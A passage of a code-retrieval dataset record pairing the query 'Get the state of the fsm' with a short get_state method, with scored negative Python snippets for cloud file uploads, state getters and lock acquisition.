\".format(count))\n logger.info(\"took {:10.4f} seconds to upload {} frames\".format(time.time() - start, REPORT_STATUS))\n start = time.time()\n logger.info(\"uploaded {} frames to s3://{}/{}\".format(count, s3_bucket, frames_s3_prefix))\n\n if preview_file_name is not None:\n preview_file_s3_key = video_preview_prefix + preview_file_name\n s3.Bucket(s3_bucket).upload_file(os.path.join(working_dir, preview_file_name), preview_file_s3_key)\n logger.info(\"uploaded preview to s3://{}/{}\".format(s3_bucket, preview_file_s3_key))", "def _upload_file_to_container(self, container, object_key, file_path, connection):\r\n data = open(file_path, 'rb')\r\n logger.debug('upload {file_path} to {container} {object_key}'.format(file_path=file_path, container=container,\r\n object_key=object_key))\r\n\r\n result = connection.object_store.upload_object(container=container,\r\n name=object_key,\r\n data=open(file_path, 'r'))\r\n\r\n logger.debug(result)", "def upload_file(cluster, girder_token, file, path):\n girder_client = GirderClient(apiUrl=cumulus.config.girder.baseUrl)\n girder_client.token = girder_token\n with get_connection(girder_token, cluster) as conn:\n conn.makedirs(os.path.dirname(path))\n _upload_file(conn, girder_client, file, path)", "def _upload_to_s3(filename):\n if not app.config.get('UPLOAD_SCREENSHOTS_TO_S3', False):\n return\n\n import boto\n from boto.s3.key import Key\n conn = boto.connect_s3()\n b = conn.get_bucket(app.config['S3_BUCKET'])\n k = Key(b)\n k.key = '{}/{}'.format(\n app.config.get('S3_FILES_PREFIX', 'sleepypuppy'),\n filename\n )\n k.set_contents_from_filename(\n \"{}/{}\".format(\n app.config['UPLOAD_FOLDER'],\n filename\n )\n )\n os.remove(\n \"{}/{}\".format(\n app.config['UPLOAD_FOLDER'],\n filename\n )\n )", "def upload_blob(bucket_name, source_file_name, destination_blob_name):\n # bucket_name = \"your-bucket-name\"\n # source_file_name = \"local/path/to/file\"\n # destination_blob_name = \"storage-object-name\"\n\n storage_client = storage.Client()\n bucket = storage_client.bucket(bucket_name)\n blob = bucket.blob(destination_blob_name)\n\n blob.upload_from_filename(source_file_name)\n\n print(\n \"File {} uploaded to {}.\".format(\n source_file_name, destination_blob_name\n )\n )" ]
[ "0.6746442", "0.6491204", "0.63522506", "0.6235617", "0.6157146", "0.61324275", "0.6127183", "0.6115192", "0.61045253", "0.6098759", "0.60934263", "0.6089703", "0.60668164", "0.60577595", "0.5977721", "0.5973843", "0.59473646", "0.5942112", "0.5934158", "0.5906467", "0.59060514", "0.59009403", "0.589082", "0.5860991", "0.58570814", "0.5855367", "0.5852083", "0.5844416", "0.5829742", "0.58231556", "0.58153045", "0.58133286", "0.5808229", "0.5795365", "0.579406", "0.57907224", "0.5786671", "0.57676554", "0.57515323", "0.5742465", "0.57394797", "0.5717029", "0.5716955", "0.57048297", "0.5687541", "0.56723785", "0.565599", "0.5640741", "0.56355613", "0.5635118", "0.5630258", "0.5628934", "0.5624051", "0.56192094", "0.5609027", "0.56047654", "0.5603055", "0.560212", "0.56020695", "0.55987006", "0.55763173", "0.5569162", "0.55557615", "0.55486333", "0.554798", "0.55467206", "0.55415547", "0.55248183", "0.5523339", "0.55164325", "0.5515865", "0.55072594", "0.5505801", "0.5504942", "0.5490117", "0.5487871", "0.5486259", "0.5484544", "0.5482749", "0.54804456", "0.54784274", "0.54757077", "0.5473381", "0.5472214", "0.5466865", "0.5462733", "0.5458692", "0.5457316", "0.5454151", "0.54535353", "0.54482275", "0.54283", "0.5424926", "0.5422325", "0.54194725", "0.54154944", "0.5412767", "0.5412148", "0.54054004", "0.5404316", "0.54020065" ]
0.0
-1
Get the state of the fsm
def get_state(self, node_uuid, index):
    return self.state
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def GetState(self):\r\n \r\n return self.state", "def getState():\n # TODO: this isn't nearly as meaningful as it used to be", "def getState(self):\r\n return self._get_SS_State()#self.currentState\r", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def _get_state(self):\n return self.__state", "def 
_get_state(self):\n return self.__state", "def get_state(self):\n return self.env.sim.get_state()", "def get_state(self):\n return self.state", "def get_state(self):\n return self.state", "def get_state(self, state):\n return state", "def return_state(self):\n\t\treturn self.state", "def getState(self) :\n return self.state", "def get_state(self):\n return self.controller.get_state()", "def get_state(self):\n pass", "def state(self) :\n\t\ttry :\n\t\t\treturn self._state\n\t\texcept Exception as e:\n\t\t\traise e", "def get_state(self,p):\n self._validate(p)\n return p.state()", "def getState(self):\r\n self.UpdateState()\r\n return self.cur_state", "def get_state(self):\n return self._state", "def get_state(self):\n return self._state", "def get_state(self):\n return self._state", "def get_state(self):\n return self._state", "def get_state(self):\n return self._state", "def _get_state(self):\n print(\"GET STATE\")\n res = self._send_command(\n \"RS;\",\n fb_required=True,\n res_pattern=\"STATE:\")\n # The received answer is supposed to be something like\n # STATE:0|1|-1\n state = int(res.split(':')[1])\n if state == PVDriver.IDLE:\n return \"IDLE\"\n elif state == PVDriver.MOVING:\n return \"MOVING\"\n else:\n return \"ERROR\"", "def get_state(self):\n self.request_state()\n e = self.get_event()\n if e.id != ID_STATE:\n raise GrblEventError(e)\n return e.data", "def getState(self):\n return self.state", "def getState(self):\n return self.state", "def getState(self):\n return self.state", "def get_state(self):\n raise NotImplementedError", "def get_state(self):\n raise NotImplementedError", "def get_state(self):\r\n alarm = self._alarm()\r\n return alarm.state", "def state(self):\n print(\"getter of variable state called\")\n return self._state", "def get_state(self):\n return ONEUP_STATES[self.state][0]" ]
[ "0.77134407", "0.76589096", "0.76107895", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7550614", "0.7541505", "0.7517409", "0.7517409", "0.74390864", "0.74369746", "0.7416075", "0.7413919", "0.7335057", "0.7310263", "0.7279341", "0.72768843", "0.727576", "0.727576", "0.727576", "0.727576", "0.727576", "0.72707576", "0.7246396", "0.7232098", "0.7232098", "0.7232098", "0.72023994", "0.72023994", "0.71446645", "0.71196526", "0.7104393" ]
0.0
-1
Get a lock on the bus
def bus_acquire(self, blocking=True):
    if self._bus_lock.acquire(blocking):
        return True
    return False
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_lock(name):\n return _handler_locks[name]", "def get_lock():\n\n return multiprocessing.Lock()", "def get_lock(self, name, try_=False):\n lock = Lock(self, name, try_)\n with lock as got_lock:\n yield got_lock", "def get_lock(self):\n function_string = 'IFLOCK'\n self.scpi_comm(function_string)\n function_string = 'IFLOCK?'\n status = int(self.scpi_comm(function_string))\n return_message = \"\"\n if status == 0:\n return_message = \"Not successful\"\n if status == -1:\n return_message = \"Device already locked\"\n if status == 1:\n return_message = \"Lock acquired\"\n return return_message", "def get(name: str) -> RWLock:\n lock = RwLocks.by_name.get(name)\n if lock is None:\n lock = RwLocks.by_name[name] = RWLock()\n return lock", "def lock_object(self):\n return gevent.thread.allocate_lock()", "def __getattr__(self, name):\n return getattr(self._lock, name)", "def lock(self):\r\n return self._lock", "def lock(self):\n return self._lock", "def __call__(self, resource: LockResource, timeout: timedelta) -> Lock:", "def __getitem__(self, hashlock):\n return self.locked[hashlock]", "def get_lock(self):\n \n svc = \"urn:micasaverde-com:serviceId:DoorLock1\"\n if not svc in self.services:\n raise RuntimeError, \"Device doesn't support the service\"\n \n status = self.get_variable(svc, \"Status\")\n return status == 1", "def lock(self) -> TokenEKeyLock:\n return self._lock", "def create_lock() -> Lock:\n return Lock()", "def lock(self):\n print(\"DEPRECATED lock\")\n return self._operations.lock()", "def shared_lock(self):\n return self.lock(False)", "def bus_locked(self):\n return self._bus_lock.locked()", "def TryLock():\n now_time = datetime.datetime.utcnow()\n expire_time = now_time + self._expire_timedelta\n\n lock = db.get(self._lock_key)\n if lock is None:\n lock = LockModel(key_name=self._lock_key.name(),\n expire_time=expire_time, lock_data=lock_data)\n lock.put()\n return lock\n elif lock.expire_time < now_time:\n lock.expire_time = expire_time\n lock.put()\n return lock\n return None", "def _try_acquire_listgen_lock(self):\n with self._conn as conn, conn.cursor() as cursor:\n cursor.execute('SELECT pg_try_advisory_lock(%s::BIGINT)', [self._lock_key])\n return cursor.fetchone()[0]", "def get_named_lock(self, name):\r\n # Global critical section\r\n self._named_locks_lock.acquire()\r\n if not name in self._named_locks:\r\n self._named_locks[name] = BoundedSemaphore()\r\n self._named_locks_lock.release()\r\n # End global critical section\r\n\r\n self.log.debug(\"Grabbing named lock (%s)\" % name)\r\n self._named_locks[name].acquire()\r\n self.log.debug(\"Got named lock (%s)\" % name)", "def _get_lock(self, hash_bytes: bytes) -> Optional[Lock]:\n if not self._should_lock:\n return None\n\n with self._weakref_lock:\n lock = self._weakref_lock_per_hash.get(hash_bytes, None)\n if lock is None:\n lock = Lock()\n self._weakref_lock_per_hash[hash_bytes] = lock\n return lock", "def svn_fs_get_lock(*args):\r\n return _fs.svn_fs_get_lock(*args)", "def acquire(self, retry=True):\n lock_conductor_id = objects.BayLock.create(self.bay.uuid,\n self.conductor_id)\n if lock_conductor_id is None:\n LOG.debug(\"Conductor %(conductor)s acquired lock on bay \"\n \"%(bay)s\" % {'conductor': self.conductor_id,\n 'bay': self.bay.uuid})\n return\n\n if (lock_conductor_id == self.conductor_id or\n self.conductor_alive(self.context, lock_conductor_id)):\n LOG.debug(\"Lock on bay %(bay)s is owned by conductor \"\n \"%(conductor)s\" % {'bay': self.bay.uuid,\n 'conductor': lock_conductor_id})\n raise 
exception.OperationInProgress(bay_name=self.bay.name)\n else:\n LOG.info(_LI(\"Stale lock detected on bay %(bay)s. Conductor \"\n \"%(conductor)s will attempt to steal the lock\"),\n {'bay': self.bay.uuid, 'conductor': self.conductor_id})\n\n result = objects.BayLock.steal(self.bay.uuid,\n lock_conductor_id,\n self.conductor_id)\n\n if result is None:\n LOG.info(_LI(\"Conductor %(conductor)s successfully stole the \"\n \"lock on bay %(bay)s\"),\n {'conductor': self.conductor_id,\n 'bay': self.bay.uuid})\n return\n elif result is True:\n if retry:\n LOG.info(_LI(\"The lock on bay %(bay)s was released while \"\n \"conductor %(conductor)s was stealing it. \"\n \"Trying again\"),\n {'bay': self.bay.uuid,\n 'conductor': self.conductor_id})\n return self.acquire(retry=False)\n else:\n new_lock_conductor_id = result\n LOG.info(_LI(\"Failed to steal lock on bay %(bay)s. \"\n \"Conductor %(conductor)s stole the lock first\"),\n {'bay': self.bay.uuid,\n 'conductor': new_lock_conductor_id})\n\n raise exception.OperationInProgress(bay_name=self.bay.name)", "def tarantool_lock(self):\n if self._lockinst is None:\n self._lockinst = threading.Lock()\n\n return self._lockinst", "def locked_get(self):\n credential = self._multistore._get_credential(self._key)\n if credential:\n credential.set_store(self)\n return credential", "def lock(self, nReserved):\n\t\treturn Job(SDK.PrlVm_Lock(self.handle, nReserved)[0])", "def getAccessLock(self):\n return self._dataLock", "def acquire_lock_1(force, lock_file=None):\n if lock_file is None:\n lock_file = config.LOCK_FILE\n lock = Lock(lock_file, LOCK_LIFETIME)\n try:\n lock.lock(timedelta(seconds=0.1))\n return lock\n except TimeOutError:\n if not force:\n raise\n # Force removal of lock first.\n lock.disown()\n hostname, pid, tempfile = lock.details\n os.unlink(lock_file)\n return acquire_lock_1(force=False)", "def unlocked():\r\n return Lock(None)", "def acquire(self, blocking=True, shared=False):", "def acquire(self, wait=True):\n return self.__lock.acquire(wait)", "def walletlock(self):\n return self.proxy.walletlock()", "def acquire(self):\n retries = [0]\n self._acquire_start_seconds = self._reactor.seconds()\n\n def log_lock_acquired(result):\n self._lock_acquired_seconds = self._reactor.seconds()\n seconds = self._lock_acquired_seconds - self._acquire_start_seconds\n self._log.msg('Acquired lock in {0} seconds'.format(seconds),\n lock_acquire_time=seconds, **self._log_kwargs)\n return result\n\n def acquire_lock():\n d = self._write_lock()\n d.addCallback(self._read_lock)\n d.addCallback(self._verify_lock)\n if self._log:\n d.addCallback(log_lock_acquired)\n d.addErrback(lock_not_acquired)\n return d\n\n def lock_not_acquired(failure):\n failure.trap(BusyLockError, NoLockClaimsError)\n retries[0] += 1\n if retries[0] <= self._max_retry:\n return task.deferLater(self._reactor, self._retry_wait, acquire_lock)\n else:\n return failure\n\n def log_lock_acquire_failure(failure):\n if self._log:\n seconds = self._reactor.seconds() - self._acquire_start_seconds\n self._log.msg(\n 'Could not acquire lock in {0} seconds due to {1}'.format(seconds, failure),\n lock_acquire_fail_time=seconds, reason=failure, **self._log_kwargs)\n return failure\n\n return acquire_lock().addErrback(log_lock_acquire_failure)", "def read_lock(self, timeout=None, _id=None):\n me = _id or (current_process().ident, current_thread().ident)\n\n # noinspection PyMethodParameters,PyUnusedLocal\n class ReadWithLock (object):\n\n def __enter__(_self):\n self.acquireRead(timeout, me)\n\n def 
__exit__(_self, *args):\n self.releaseRead(me)\n\n return ReadWithLock()", "def __enter__(self):\n return self._lock.__enter__()", "def _get_locked(self, mountpoint):\n # This dance is because we delete locks. We need to be sure that the\n # lock we hold does not belong to an object which has been deleted.\n # We do this by checking that mountpoint still refers to this object\n # when we hold the lock. This is safe because:\n # * we only delete an object from mountpounts whilst holding its lock\n # * mountpoints is a defaultdict which will atomically create a new\n # object on access\n while True:\n mount = self.mountpoints[mountpoint]\n with mount.lock:\n if self.mountpoints[mountpoint] is mount:\n yield mount\n break", "def rlock_object(self):\n return RLock()", "def acquire_lock(force):\n try:\n lock = acquire_lock_1(force)\n return lock\n except TimeOutError:\n status, lock = master_state()\n if status is WatcherState.conflict:\n # Hostname matches and process exists.\n message = _(\"\"\"\\\nThe master lock could not be acquired because it appears as though another\nmaster is already running.\"\"\")\n elif status is WatcherState.stale_lock:\n # Hostname matches but the process does not exist.\n program = sys.argv[0] # noqa: F841\n message = _(\"\"\"\\\nThe master lock could not be acquired. It appears as though there is a stale\nmaster lock. Try re-running $program with the --force flag.\"\"\")\n elif status is WatcherState.host_mismatch:\n # Hostname doesn't even match.\n hostname, pid, tempfile = lock.details\n message = _(\"\"\"\\\nThe master lock could not be acquired, because it appears as if some process\non some other host may have acquired it. We can't test for stale locks across\nhost boundaries, so you'll have to clean this up manually.\n\nLock file: $config.LOCK_FILE\nLock host: $hostname\n\nExiting.\"\"\")\n else:\n assert status is WatcherState.none, (\n 'Invalid enum value: ${0}'.format(status))\n hostname, pid, tempfile = lock.details\n message = _(\"\"\"\\\nFor unknown reasons, the master lock could not be acquired.\n\n\nLock file: $config.LOCK_FILE\nLock host: $hostname\n\nExiting.\"\"\")\n config.options.parser.error(message)", "def getLockByID(self, lockid):\n assert isinstance(lockid, (locks.MasterLock, locks.SlaveLock))\n if not lockid in self.locks:\n self.locks[lockid] = lockid.lockClass(lockid)\n # if the master.cfg file has changed maxCount= on the lock, the next\n # time a build is started, they'll get a new RealLock instance. 
Note\n # that this requires that MasterLock and SlaveLock (marker) instances\n # be hashable and that they should compare properly.\n return self.locks[lockid]", "def lock(self):\n from .services import locking\n\n return locking.lock_quota(self)", "def get(self, key, lock):\n raise NotImplementedError()", "def read_acquire(self):\n self.is_locked = True\n self.rwlock = RWLock().read_acquire()", "def RLock():\n import threading\n return threading.RLock()", "def __createLock(self):\n lockUrl = self.metaData.getLink(\"lock\")\n assert lockUrl is not None\n\n lockBody = json.dumps({\"lockIntent\" : \"lockedForEdit\"})\n header = self._baseHeader.copy()\n header['Content-type'] = \"application/vnd.huddle.data+json\"\n lockResponse = self._adapter.postRequest(lockUrl, header, lockBody)\n\n return lockResponse", "def acquire_lock (self):\n\n self._exec (self.select)\n self.locked = True", "def lock(self):\n raise NotImplementedError", "def acquire(self):\n waiter = Future()\n if self.redis_client.set(self.key, self.value, ex=self.ttl, nx=True):\n waiter.set_result(locks._ReleasingContextManager(self))\n else:\n waiter.set_exception(DDosError(\"被暴击了\"))\n # def on_timeout():\n # waiter.set_exception(gen.TimeoutError())\n # io_loop = ioloop.IOLoop.current()\n # timeout_handle = io_loop.add_timeout(timeout, on_timeout)\n # waiter.add_done_callback(\n # lambda _: io_loop.remove_timeout(timeout_handle))\n return waiter", "def AcquireLock(self, lock_data=None):\n if lock_data is None: lock_data = {}\n lock_data = LockData(lock_data)\n\n def TryLock():\n \"\"\"Function to acquire lock within a transaction.\n\n Returns:\n Returns any shared data that might have been stored in the lock.\n \"\"\"\n now_time = datetime.datetime.utcnow()\n expire_time = now_time + self._expire_timedelta\n\n lock = db.get(self._lock_key)\n if lock is None:\n lock = LockModel(key_name=self._lock_key.name(),\n expire_time=expire_time, lock_data=lock_data)\n lock.put()\n return lock\n elif lock.expire_time < now_time:\n lock.expire_time = expire_time\n lock.put()\n return lock\n return None\n\n trials = 0\n self._acquired_lock = None\n while self._acquired_lock is None and (self._try_count == 0 or\n trials < self._try_count):\n trials += 1\n\n try:\n self._acquired_lock = db.run_in_transaction(TryLock)\n except db.TransactionFailedError:\n pass\n\n if self._acquired_lock is None:\n time.sleep(self._sleep_seconds)\n\n if self._acquired_lock is None:\n logging.info('failed attempt to acquire lock %s', self._lock_key.name())\n raise errors.LockAcquireFailure('Failed to acquire lock %s' %\n self._lock_key.name())\n\n return self._acquired_lock.lock_data.data", "def test_lock(self):\n lock = self.tx_client.Lock(\"xyzzy\", identifier=\"iddqd\")\n self.assertIdentical(lock._reactor, self.reactor)\n self.assertIdentical(lock._pool, self.pool)\n\n self.assertEqual(lock.path, \"xyzzy\")\n self.assertEqual(lock.identifier, \"iddqd\")", "def acquire(self, timeout=None):\r\n try:\r\n open(self.unique_name, \"wb\").close()\r\n except IOError:\r\n raise LockFailed\r\n\r\n end_time = time.time()\r\n if timeout is not None and timeout > 0:\r\n end_time += timeout\r\n\r\n while True:\r\n # Try and create a hard link to it.\r\n try:\r\n os.link(self.unique_name, self.lock_file)\r\n except OSError:\r\n # Link creation failed. Maybe we've double-locked?\r\n nlinks = os.stat(self.unique_name).st_nlink\r\n if nlinks == 2:\r\n # The original link plus the one I created == 2. 
We're\r\n # good to go.\r\n return\r\n else:\r\n # Otherwise the lock creation failed.\r\n if timeout is not None and time.time() > end_time:\r\n os.unlink(self.unique_name)\r\n if timeout > 0:\r\n raise LockTimeout\r\n else:\r\n raise AlreadyLocked\r\n time.sleep(timeout is not None and timeout/10 or 0.1)\r\n else:\r\n # Link creation succeeded. We're good to go.\r\n return", "def get_lock():\n fh = None\n # We don't do anything unless --synchronous_name is set.\n if args.synchronous_name is not None:\n if not os.path.isdir(args.synchronization_dir):\n log('--synchronization_dir does not exist, attempting to create')\n os.mkdir(args.synchronization_dir)\n\n lock = os.path.join(args.synchronization_dir, args.synchronous_name)\n fh = open(lock, 'w')\n log('Acquiring lock on %s' % lock)\n if args.nonblocking:\n try:\n fcntl.flock(fh, fcntl.LOCK_EX | fcntl.LOCK_NB)\n except IOError:\n log('We did not get the lock but --nonblocking is true; '\n 'exiting successfully')\n fh.close()\n sys.exit(0)\n else:\n # Wait indefinitely. Hopefully there is a timeout on the synchro.py\n # holding the lock.\n fcntl.flock(fh, fcntl.LOCK_EX)\n log('Lock acquired')\n return fh", "def lock(self, name, timeout=None, sleep=0.1):\n return Lock(self, name, timeout=timeout, sleep=sleep)", "def acquire(self, blocking=True):\n ops = fcntl.LOCK_EX\n if not blocking:\n ops |= fcntl.LOCK_NB\n fcntl.flock(self.lock_file, ops)", "def acquire_distributed_beat_lock(sender=None, **kwargs):\n scheduler = sender.scheduler\n if not scheduler.lock_key:\n return\n\n logger.debug('beat: Acquiring lock...')\n redis_client = get_redis(scheduler.app)\n\n lock = redis_client.lock(\n scheduler.lock_key,\n timeout=scheduler.lock_timeout,\n sleep=scheduler.max_interval,\n )\n # overwrite redis-py's extend script\n # which will add additional timeout instead of extend to a new timeout\n lock.lua_extend = redis_client.register_script(LUA_EXTEND_TO_SCRIPT)\n lock.acquire()\n logger.info('beat: Acquired lock')\n scheduler.lock = lock", "def lock(*args):", "def waitlock(self, nick, channel, resourcestr):\n return (channel, self._lock(nick, nick, resourcestr, wait=True))", "def lock_config(self) -> 'outputs.LockConfigResponse':\n return pulumi.get(self, \"lock_config\")", "def _volume_lock(self, volume_path):\n return self._lock(self._volume_metadata_path(volume_path))", "def response_lock(self) -> asyncio.Lock:\n return self._response_lock", "def get_lock():\n if not os.path.exists(lock_file):\n fl = open(lock_file, 'a+')\n try:\n fcntl.lockf(fl, fcntl.LOCK_EX | fcntl.LOCK_NB)\n except IOError as e:\n if e.errno not in (errno.EACCES, errno.EAGAIN):\n # Something else started. 
This is not likely.\n raise(IOError, 'already locked')\n sys.exit(1)\n else:\n fl = open(lock_file, 'r+')\n try:\n fcntl.lockf(fl, fcntl.LOCK_EX | fcntl.LOCK_NB)\n except IOError as e:\n # File is lready locked.\n raise(IOError, 'already locked')\n sys.exit(2)\n return fl", "def lock_control(self):\n raise NotImplementedError('PlatformService: Implementation incomplete')", "def acquire(lockfile, timeout=None):\n\tif timeout is None:\n\t\ttimeout = max_timeout # 100yrs should suffice\n\tretries = int(float(timeout)/wait_interval)\n\n\t_lock_acquire(lockfile, retries)\n\t\n\treturn lockfile", "def thread_lock(self, bay_uuid):\n try:\n self.acquire()\n yield\n except exception.OperationInProgress:\n raise\n except: # noqa\n with excutils.save_and_reraise_exception():\n self.release(bay_uuid)", "def svn_info_t_lock_get(svn_info_t_self): # real signature unknown; restored from __doc__\n pass", "def acquire(self):\r\n self.log('acquire enter')\r\n\r\n start = datetime.now()\r\n\r\n # try and fetch the lock, looping until it's available\r\n while not self.try_acquire():\r\n if (datetime.now() - start).seconds > self.timeout:\r\n raise TimeoutExpired\r\n sleep(0.1)\r\n\r\n self.log('acquire exit')", "def _lock(req): # static method\n tran = req.db.transaction(req.log_info)\n c = tran.cursor()\n c.execute('BEGIN EXCLUSIVE TRANSACTION')\n return c", "def lock_for_update(self):\n return self.lock(True)", "def lock(self, item_type):", "def __enter__(self):\r\n if not self.is_locked:\r\n self.acquire()\r\n return self", "def get(self, block=True, timeout=None):\n if not self.connected:\n raise QueueNotConnectedError(\"Queue is not Connected\")\n\n if block:\n payload = self.__db.brpop(self._key, timeout=timeout)\n else:\n payload = self.__db.rpop(self._key)\n\n if not payload:\n return None\n\n task = self.task_class(payload[1])\n\n # if task was marked as unique then\n # remove the unique_hash from lock table\n if task.unique:\n self.__db.srem(self._lock_key, task.unique_hash())\n\n return task", "def acquire_node(self, node):\n try:\n return node.set(self.resource, self.lock_key, nx=True, px=self.ttl)\n except (redis.exceptions.ConnectionError, redis.exceptions.TimeoutError):\n return False", "def acquire_lock(_uuid, lock_uuid=None, lock_owner=None, db=None, c=None):\n\n try:\n if lock_uuid is None:\n lock_uuid = str(uuid.uuid4())\n\n execute_with_retry(db, c, \"INSERT INTO locks ( uuid, lock_uuid, lock_owner, lock_time ) VALUES ( %s, %s, %s, NOW() )\", \n ( _uuid, lock_uuid, lock_owner ), commit=True)\n\n logging.debug(\"locked {} with {}\".format(_uuid, lock_uuid))\n return lock_uuid\n\n except pymysql.err.IntegrityError as e:\n # if a lock already exists -- make sure it's owned by someone else\n try:\n db.rollback()\n # assume we already own the lock -- this will be true in subsequent calls\n # to acquire the lock\n execute_with_retry(db, c, \"\"\"\nUPDATE locks \nSET \n lock_time = NOW(),\n lock_uuid = %s,\n lock_owner = %s\nWHERE \n uuid = %s \n AND ( lock_uuid = %s OR TIMESTAMPDIFF(SECOND, lock_time, NOW()) >= %s )\n\"\"\", (lock_uuid, lock_owner, _uuid, lock_uuid, saq.LOCK_TIMEOUT_SECONDS))\n db.commit()\n\n c.execute(\"SELECT lock_uuid, lock_owner FROM locks WHERE uuid = %s\", (_uuid,))\n row = c.fetchone()\n if row:\n current_lock_uuid, current_lock_owner = row\n if current_lock_uuid == lock_uuid:\n logging.debug(\"locked {} with {}\".format(_uuid, lock_uuid))\n return lock_uuid\n\n # lock was acquired by someone else\n logging.debug(\"attempt to acquire lock {} failed (already locked by {}: 
{})\".format(\n _uuid, current_lock_uuid, current_lock_owner))\n\n else:\n # lock was acquired by someone else\n logging.info(\"attempt to acquire lock {} failed\".format(_uuid))\n\n return False\n\n except Exception as e:\n logging.error(\"attempt to acquire lock failed: {}\".format(e))\n report_exception()\n return False\n\n except Exception as e:\n logging.error(\"attempt to acquire lock failed: {}\".format(e))\n report_exception()\n return False", "def acquire_lock(self):\n self._multistore._lock()", "def get_lock(lock_dir=None, **kw):\r\n if lock_dir is None:\r\n lock_dir = os.path.join(config.compiledir, 'lock_dir')\r\n if not hasattr(get_lock, 'n_lock'):\r\n # Initialization.\r\n get_lock.n_lock = 0\r\n if not hasattr(get_lock, 'lock_is_enabled'):\r\n # Enable lock by default.\r\n get_lock.lock_is_enabled = True\r\n get_lock.lock_dir = lock_dir\r\n get_lock.unlocker = Unlocker(get_lock.lock_dir)\r\n else:\r\n if lock_dir != get_lock.lock_dir:\r\n # Compilation directory has changed.\r\n # First ensure all old locks were released.\r\n assert get_lock.n_lock == 0\r\n # Update members for new compilation directory.\r\n get_lock.lock_dir = lock_dir\r\n get_lock.unlocker = Unlocker(get_lock.lock_dir)\r\n\r\n if get_lock.lock_is_enabled:\r\n # Only really try to acquire the lock if we do not have it already.\r\n if get_lock.n_lock == 0:\r\n lock(get_lock.lock_dir, timeout=timeout_before_override, **kw)\r\n atexit.register(Unlocker.unlock, get_lock.unlocker)\r\n # Store time at which the lock was set.\r\n get_lock.start_time = time.time()\r\n else:\r\n # Check whether we need to 'refresh' the lock. We do this every\r\n # 'refresh_every' seconds to ensure noone else tries to override\r\n # our lock after their 'timeout_before_override' timeout period.\r\n now = time.time()\r\n if now - get_lock.start_time > refresh_every:\r\n lockpath = os.path.join(get_lock.lock_dir, 'lock')\r\n _logger.info('Refreshing lock %s', str(lockpath))\r\n refresh_lock(lockpath)\r\n get_lock.start_time = now\r\n get_lock.n_lock += 1", "def pilotLock (self):\n return self.unlock()", "def get(self):\r\n try:\r\n # get with block=False returns an item if one\r\n # is immediately available, else raises the Empty exception\r\n return self._queue.get(block=False)\r\n except queue.Empty:\r\n return self._create_connection()", "def lock(self, writelock=False, nattempts=0):\n return _image.image_lock(self, writelock, nattempts)", "def create_lock(self, resource, **kwargs):\n lock = DistLock(resource=resource, created_by_factory=True, **kwargs)\n lock.redis_nodes = self.redis_nodes\n lock.quorum = self.quorum\n lock.factory = self\n return lock", "def __enter__(self):\n if not self.is_locked:\n self.acquire()\n return self", "def get(self):\n # we use the with-statement here to automatically\n # release the lock when we return\n with self.mutex:\n return self.value", "def get(self):\n with self.__lock:\n while True:\n try:\n job = self.__queue.get(False)\n self.__lock.notify_all()\n return job\n except Queue.Empty:\n self.__lock.wait()", "def get_lock_time():\n pass", "def __call__(self, o):\n if not self.available(o):\n raise ValueError('already locked')\n self._owner = o", "async def 